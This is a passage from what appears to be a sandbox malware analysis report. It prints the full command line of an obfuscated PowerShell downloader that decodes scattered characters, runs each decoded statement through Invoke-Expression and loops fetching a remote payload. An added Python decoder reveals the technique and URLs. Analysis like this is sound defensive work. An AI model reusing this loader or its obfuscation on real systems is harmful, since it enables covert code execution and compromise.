                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne';$Undsatdeoglyph = 1;Function Psykopaterne($Spleenens){$Diastem=$Spleenens.Length-$Undsatdeoglyph;$Noiler='SUBSTRIN';$Noiler+='G';For( $Undsat=5;$Undsat -lt $Diastem;$Undsat+=6){$Undramatisables+=$Spleenens.$Noiler.Invoke( $Undsat, $Undsatdeoglyph);}$Undramatisables;}function responsibly($Intraovarian129){ & ($Forgyldte) ($Intraovarian129);}$Skovtrernes=Psykopaterne 'nonamMHaydooDygtizCadeaiApplal Appel Mokkarepor/ Inds5Frak .Unde 0Talam W gsu(HappiWNonauiIrresnvivifd,ssocoTraktw,oressRabar SphecN fashTNonr, Kansa1Bes,t0Theop.Maint0Vap r; Bunt a.goWMaskei Pa.rnL.nia6S.ven4Syste;Petal VisoxAfg e6 Proc4Modst;Sanit Arm,nrOrdfovZ,nag: ista1Uvaer2Stopf1Sixti.Skrav0 Re.o)Photo Ga esGBagsteOvergc Cr.tkQuadroDoggi/thaum2 Vald0Amt,b1Physi0 Isse0N.gle1Phaet0Subco1Stigr SweeFSki.oiFin,erm duleK aphfGeneroClangx frem/Prale1Unsea2,ncul1 Caus.P.dio0S.asi ';$Hir=Psykopaterne 'PipesUnonresTmrerePernarUn ha-r,ferABiplag O hee RingnSixtytevent ';$Orloven=Psykopaterne 'DatabhUncoutNoncotfornupC,mpas Prad:Kodni/ .ypo/UnspiwAfmgtwArtifwPerfe. HolgeConfer,wirpph gga-Twi.erSkulaoStiftySpir,aProfilTvrli-Uni,pcTid.arPi gioReptiw PuttnAn id. 
DediiChadondeflofIndesoAcras/ PrdiwLenshhHotbr/CatapSStempa nagorGuleroVaabetChesthByggerLan,bu Vi,kmtrich.Adva,jLon.opvermibCamph> He.uhGarant ForbtBlamapItalisGypso: Must/Di ci/ Methw Undewforurw,ipse.Prom aPar.plSlmnimMobedr ConswVejgra,rogrd Togf.Barsecpara oStjdemCitat/Anywhw CholhSkaks/StyreS SwotaSheikrRutebo Sub.tVestshS,regr,emicuSepalmGela.. StikjNiddepSilicbLgnag ';$Syndsbekendelsens=Psykopaterne ' Insk>Strou ';$Forgyldte=Psykopaterne 'ShoppiMeasueEtta,xpoo.a ';$grydeskeers='Idrtsparkerne';$Advoker = Psykopaterne 'EftereGr,ndc StrihSa,lioDeta. Stad%RecidaGainspUlyksp Ud rd ilmna,glertForhaa M,no%Renai\.igenA.onathLandfoHash rSupponTrykitHailerL,cie.Slid.P Av.siTr,kabUnexo Bildk&Super&Sig l skyfoeSha.ec Rabah,ragioUnder OverftDisbr ';responsibly (Psykopaterne 'Farin$CyclogkontrlFr.byoCity,bRaakoaTematlNy.ed: A arBEpipto NitreLabourMilieeCla,s=Stran(,ragecOve hmI,terd,husc Va.df/Deminc.rape do b$OutbeA,udsedTu.thv.ttitoTalsykstab,e Outfrc alo)Res u ');responsibly (Psykopaterne 'Kalor$ E ebgAp.relKnn,soephyrbNa,uaaHonorlCompu: ,elgCF.rstrBayera Plumc,orthkConflaBrndsjStu saSvag,cIndl.kAbiga= Co e$.merkOBagvar ,rnelFolieoSyn ev,ngore Overn fluo. 
CollsDabbnp uperl ,onriAdmistReas,(Gyroc$SubpoSTimaly ouchnA tindAadalsUnextbSvidueIldstk .rcae.hicqnDressdSla,ge Re.llDriftsLyskoeDaadynVur es U or)Bugg ');responsibly (Psykopaterne 'Discr[NondeN,ungeeAletht .nds.DeleaSBal,ueArketrShehivIrideiAliptcSynodeOverfPHandeoIlyusi BurenBj,intHnekyMNonsua isagn Cycaa utohgBartoeReendrf eda]Obser:Blurr:NulpuSMegaleSubclcCalorubronzr.hanti.eniltF,iery eavP LiftrUndeeoDragetRenteoTwi,ocTvenloProfelSejer P,str= ttr S.mme[ RegrNBuldeeCompatVener.Sukk,STh aseBealtcMar euepir,r VsbeisindetRumleyUnmirP IronrNo,deoA,hngtTrskeoDistac Udrro,adaylFir,cTfl.etyUnderpHearteMalaw]Dtres:,ifto: lkicTGa,ralNu,mesMudfl1Pante2Mainl ');$Orloven=$Crackajack[0];$Immuniseringer= (Psykopaterne 'forpl$ agakg VanvlSuspeo,nindbUnsecaInjurl Slav:Lsl dS Miliq Formu Va.ea Ch.il Drjhl PosteSnerprSolta=PlayrNBehole Re,iwKrag,-FlaggO rotbPulvejtabiaeBe,eacSkakstUds i Ye.rbSKininyMyatrsOb,eqt Bl,keCaesam epr.DeparN ,rojepredotSnedk.RetsaW KajaeNapkibOutsiCChl,rlSuba.i selveWatapn yelt');$Immuniseringer+=$Boere[1];responsibly ($Immuniseringer);responsibly (Psykopaterne ' Ren,$BrndsSEft,rqSkambuLil,ia RamtlAfterlDelage LeverModul. 
BergH Ken,eInspea VenddMdeafeUb,harAmarysScab,[Eremi$ BellHSpeciiEnedir ankf]Guldm= Stvk$prefiSUnletkmolluoSkrfnv TelttArcharTipsfeWhuzkr MagnnUdetje FikssS eka ');$Syndromic=Psykopaterne 'Twini$UvisnSSeitfqhyggeuPara,aKoo dlB,lsal,alose harmrHvsse.Un,waDLeonao ge fw DiabnMaconlBagtaoKompraTiltbd .limFdidasiRiposlVsenseMyr a(Menne$ OrieOOverfrDiskulSkjoroTimidvTaalteUdru nImpas, Spir$ScyppGRe,rieDishon fodheGookscPiluloR,ncilDruseo,ulemg VideiGstgicMiskra StanlPrlimlShellyFi,tr1 utcr4Attri9Prear) Mone ';$Genecologically149=$Boere[0];responsibly (Psykopaterne 'Eperv$De oyg Metal forho UtydbSlariaRaahulEngra: And.P PipirRadixeFien,pNonoprTowl.o FrisvFinanoBetynkBuntiePermidche s=.kken(AnthrTRe toe JurisCochltIndda-NonbuPSuperaOn.idtRockrhEpi l Ke s$aandeGK,rtoe.ominncolibeSupercAnd.tojobmulKonseoWorsegAntroi trancSaddlaSkvallDy.phlBankrySolid1 Ung.4Stenk9 Kard)Sonn. ');while (!$Preprovoked) {responsibly (Psykopaterne 'Cel,b$Race gG.rerl Tolbo PeribCroo.aToc al raft: .ifeCPeache WiglnInopetLig,rrStanciTupmasBeribt UdstiMetacsSammekAdmiseDemiw= S,li$Endevt,hasirFrugtuFormeeThund ') ;responsibly $Syndromic;responsibly (Psykopaterne 'AuktiS UrsitRestaa,osperSyntht F er-FilmiSKamsmlborgee Zar,e overpSkimm Rec o4Lings ');responsibly (Psykopaterne 'Onrus$ ,ejrgMimidlFaldeoBenytbB.ndaaCongrl ,rim:SolomPBagderPrio.eVrkmepwi nerRepugo.utinvAperioG.melkDys.ce Gal,d Iber=Bukni(appelTFormkeSpandsTortutAabni-fructP wasaa GonatTrysah Nord Regal$ istGE.gareEnchonCan,geTronsc FrdioDrg.ilskattoMat,hgOpdrtiDisalcAktivaParkelUdsm lModsty Pre 1Backw4Under9 Na,i) Konv ') ;responsibly (Psykopaterne ' Bee.$ yperg,iplal emato As,ebH,steaHepatlM.red:MandsLB,saaiT,ackn PredjNon.aeElselts,atteO,gragK llen Gli iG sponM rosgBesposLsegr=Afhng$Ga,leg MelllFrithoWosombTillia tayslWhi p: RadiIUdviknDryptgvis,rrBe vaipantnd Subr1Glot,3Skrun0Cultu+Udtry+ B,pi%Edvi.$Kur bCUnsparF.stlaForsac LsepkFinanaAfsvajIodocaTemp,cTaksok Phyl.MiliecUdm.to InfouRuttinTusint Arge ') 
;$Orloven=$Crackajack[$Linjetegnings];}$Araliaceae=290259;$Miljkvalitetsplanlgningers=29639;responsibly (Psykopaterne 'Natio$Omdb gSoleslapp ioGourmbAnimaa TrivlLsefa:AlterPKlknioErstasSlumbtCountoDomflf.ommafUnderiAlterc I dbeKonto1Udfyl6Etymo9 Micr Cont=Skuff LametGG,dmueReligt ,mor-GrftnCPhotooCollinTeo,otPigmee.unjanGreyltD,bit D.ops$ .verGAtticeFri,enMotoremuskecL,jemoRegnil Tango S,argNorthiLselacAirifaUngdolSejerlJudi yurb,n1Acros4Pha.o9Overd ');responsibly (Psykopaterne 'silen$B,vgegProsolRiddeoBr,llbyokepa.algrlUndis:UnnapUWahidrShipreKombitOverghvalidrBrudsoMilitsaconit AbhoaR,prix,nteri D.tos Indf Baand=Unecs Yelli[StrenS.snoby Tomms duest enneeGoka.m Synk.GrinnCEdmunoU.dernLotu.vHygroeParejrUnchatNucle]Softe:Ordfr:CorpoFAttrarTota,ofr.dem esigB oncoaLandssSkalpePaa t6Upa.t4.olypSnonblt Lo,irJapaniDenunnStategAbacn(lockh$LauraPByrdeoCap is f akt P,aloOve.bfshogufhyp piFolkecSpendeTusay1Winte6Udsta9M,nha),teno ');responsibly (Psykopaterne 'Diffe$D kregBagerlVitrio Tungb ProsaU sanlInds,: GunsPEj.ndealfierNatalsMym.reUltracFormeuUn.artPrenaeo,onodV,ren Bleac=Mi be Procu[ sin SRooftyGhostsCamsht S.epeilbudmFulme..nplaT C,anePeracxIndvetSoedm. ictaENonsyn W,ldc aissoRequadkidnai Agr,nFevergOmpro] sept:Indst:linjeASt liSMedieCEjendIA.klaI Jitt.BibraGSli keRykketNota SDismatA mbrr ,proiPigt.nimporgQuarr(Droge$ TilrUVermir AnsgeMyelotBre.th,unstrmontao Grins U,retForesaAntinxPoteniG anasGenbr)Welle ');responsibly (Psykopaterne ' Aest$KumpagregenlUroceoBrisabPinliaSlettl Scar:.krudK eneto ForansikkevOp ageIllegn ReintStrop=P.nce$SaproPAfspae Bewrr.tomssBrutteEftercStranuperistPrecie,patldDyrke.Beskys uchfu ikrbgenersJovict Unl rpaal,iForlon relsgNr,ed( Anti$ansaeA.vmmer ,dveaCa.ill loseiAnaesaSleepcFaiteeSyncoa Pecheerran,A,std$ChansMAffrii BratlMa,hejAflbskHorotvToleraS temlTokr.istrobtBriefestr ttUdstysOrchepBam ul U deaInkvin Shu lC.nchg Cab.nStegeiTudesnDros gI.hereDe ucrNo.spsParac) Abol ');responsibly $Konvent;"
                                                                    Imagebase:0x7ff7be880000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false
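
The PowerShell in Target ID 7 above keeps every real character at index 5, 11, 17, ... of a junk string and reads it back with its `Psykopaterne` function: a `For` loop that starts at 5, steps by 6 and stops at `Length-1`, so the final padding character of each string is never consumed. The decoder below is an added example written for this report page; it is not code from the sample or from Joe Sandbox. The four strings it decodes are copied verbatim from the process 7 command line (`$Forgyldte`, `$Hir`, `$Syndsbekendelsens`, `$Orloven`; the last one is split across two lines on this page and is joined here with the single space that precedes `Dedii`). Other strings in that command line, for example the one that builds the `echo %appdata%` command, no longer decode from the page text because the report rendering collapsed runs of spaces inside them; the four used here contain only single spaces. The helper names `extract_and_decode` and `c2_urls` are this example's own.

```python
"""Decoder for the character-scatter obfuscation used by the PowerShell
stage in Target ID 7 (its 'Psykopaterne' function).

Added example for this report page; not code from the sample or from
Joe Sandbox.  The sample strings are copied from the process 7 command
line; SCRIPT_FRAGMENT is assembled from those same assignments.
"""
import re

# Copied from the process 7 command line.  ORLOVEN is split across two
# lines on the report page and is joined here with the single space that
# precedes 'Dedii'.  Each line below holds exactly ten 6-character cells.
FORGYLDTE = "ShoppiMeasueEtta,xpoo.a "
HIR = "PipesUnonresTmrerePernarUn ha-r,ferABiplag O hee RingnSixtytevent "
SYNDSBEKENDELSENS = " Insk>Strou "
ORLOVEN = (
    "DatabhUncoutNoncotfornupC,mpas Prad:Kodni/ .ypo/UnspiwAfmgtw"
    "ArtifwPerfe. HolgeConfer,wirpph gga-Twi.erSkulaoStiftySpir,a"
    "ProfilTvrli-Uni,pcTid.arPi gioReptiw PuttnAn id. DediiChadon"
    "deflofIndesoAcras/ PrdiwLenshhHotbr/CatapSStempa nagorGulero"
    "VaabetChesthByggerLan,bu Vi,kmtrich.Adva,jLon.opvermibCamph>"
    " He.uhGarant ForbtBlamapItalisGypso: Must/Di ci/ Methw Undew"
    "forurw,ipse.Prom aPar.plSlmnimMobedr ConswVejgra,rogrd Togf."
    "Barsecpara oStjdemCitat/Anywhw CholhSkaks/StyreS SwotaSheikr"
    "Rutebo Sub.tVestshS,regr,emicuSepalmGela.. StikjNiddepSilicb"
    "Lgnag "
)


def psykopaterne(s: str, start: int = 5, step: int = 6) -> str:
    """Python equivalent of the sample's Psykopaterne function.

    PowerShell original (variable names as they appear on the page):
        $Diastem = $Spleenens.Length - 1
        For ($Undsat = 5; $Undsat -lt $Diastem; $Undsat += 6) {
            $Undramatisables += $Spleenens.Substring($Undsat, 1)
        }
    The strict '-lt Length-1' bound means the last padding character is
    never read, which is why every obfuscated string carries one throw-away
    trailing character.
    """
    out = []
    i = start
    while i < len(s) - 1:
        out.append(s[i])
        i += step
    return "".join(out)


def extract_and_decode(script: str, func_name: str = "Psykopaterne") -> dict:
    """Find every `$Name=Psykopaterne '<junk>'` assignment in a PowerShell
    text and return {Name: decoded}.  Only single-quoted literal arguments
    are handled, which is all this stage uses."""
    pattern = re.compile(r"\$(\w+)\s*=\s*" + re.escape(func_name) + r"\s+'([^']*)'")
    return {name: psykopaterne(arg) for name, arg in pattern.findall(script)}


def c2_urls(script: str) -> list:
    """Recover the download list the way the script itself does: decode
    $Orloven, then split it on the decoded one-character separator
    $Syndsbekendelsens (the script later indexes the resulting array)."""
    decoded = extract_and_decode(script)
    return decoded["Orloven"].split(decoded["Syndsbekendelsens"])


# Assembled from the process 7 assignments, with the page's own quoting.
SCRIPT_FRAGMENT = (
    "$Hir=Psykopaterne '" + HIR + "';"
    + "$Orloven=Psykopaterne '" + ORLOVEN + "';"
    + "$Syndsbekendelsens=Psykopaterne '" + SYNDSBEKENDELSENS + "';"
    + "$Forgyldte=Psykopaterne '" + FORGYLDTE + "';"
)

if __name__ == "__main__":
    for name, value in extract_and_decode(SCRIPT_FRAGMENT).items():
        print(f"{name:>18} = {value!r}")
    print("download list:", c2_urls(SCRIPT_FRAGMENT))
```

`$Forgyldte` decodes to `iex`, which is what the `responsibly` function invokes with `&`, so every `responsibly (Psykopaterne '...')` call on the page is an `Invoke-Expression` of a freshly decoded statement. `$Orloven` decodes to the two download URLs joined by `>`, and they are exactly the two `GET /wh/Sarothrum.jpb` requests recorded in the network section above, both answered with 404.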

                                                                    Target ID:8
                                                                    Start time:04:38:24
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:9
                                                                    Start time:04:38:25
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ahorntr.Pib && echo t"
                                                                    Imagebase:0x7ff78cec0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2418541267.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff848ff0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4f7aa94bdaa38675def3528cf84b3d797a11f0b3234a68a5fc69ed9da8aaf99e
                                                                      • Instruction ID: 75a904f27dadabedc3c7c1387050bce393b29a2b924b1fb5f4d825e44de313b7
                                                                      • Opcode Fuzzy Hash: 4f7aa94bdaa38675def3528cf84b3d797a11f0b3234a68a5fc69ed9da8aaf99e
                                                                      • Instruction Fuzzy Hash: 97E13732E0EAC64FF35AA76818561B47BE1EF56290F0801BFD249C71D3DE28AC45835A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2418541267.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff848ff0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5f7b37761d7f78e33277aff4d81f86eb30c59551525afe36e71df47ac7dbe310
                                                                      • Instruction ID: 94fa6b1a61aa62e765a71a4af9d47f9ddb3d8b70dcc57cd565e357c602576795
                                                                      • Opcode Fuzzy Hash: 5f7b37761d7f78e33277aff4d81f86eb30c59551525afe36e71df47ac7dbe310
                                                                      • Instruction Fuzzy Hash: 55D15431D0EA8A5FEB96EB2858555B9BBE0EF26390F0800FBD54CC70D3DB18A845C765
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2418541267.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff848ff0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b87fbf465b54e4609b5b52fa26fe7c04f44b1d698c8a3ac91f115f9f905b4504
                                                                      • Instruction ID: c97405a104b97b9ac245f8e0219d64a90a5bb803ecc5362cb6bd3361d938a71a
                                                                      • Opcode Fuzzy Hash: b87fbf465b54e4609b5b52fa26fe7c04f44b1d698c8a3ac91f115f9f905b4504
                                                                      • Instruction Fuzzy Hash: 54212631E1EA4A4FF395A76C185517466D2EF452A0F5800BBD21DC71D3EF2DAC05421D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2417931396.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff848f20000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                      • Instruction ID: d725330ba92709bd9ebeb30e62369127f6c3244bce203fd248fe808a27b82538
                                                                      • Opcode Fuzzy Hash: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                      • Instruction Fuzzy Hash: 7701677111CB0C4FD754EF0CE451AA5B7E0FB95364F10056EE58AC36A5D736E882CB46
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2221928644.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff848fe0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ad6fd03bc8a6c4defab2cfc3517f0d1f7a110c1753101b3e8376fed3407ac89a
                                                                      • Instruction ID: f490aa9dfa0623fe674e6e012a01f1103f106a2543bb146333e6e5d2a0d6966b
                                                                      • Opcode Fuzzy Hash: ad6fd03bc8a6c4defab2cfc3517f0d1f7a110c1753101b3e8376fed3407ac89a
                                                                      • Instruction Fuzzy Hash: E5D10231D1EA8A5FEB95EB2C58199B9BBA1EF16394F0800FED04CC71D3DA1CA8058365
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2221562683.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff848f10000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9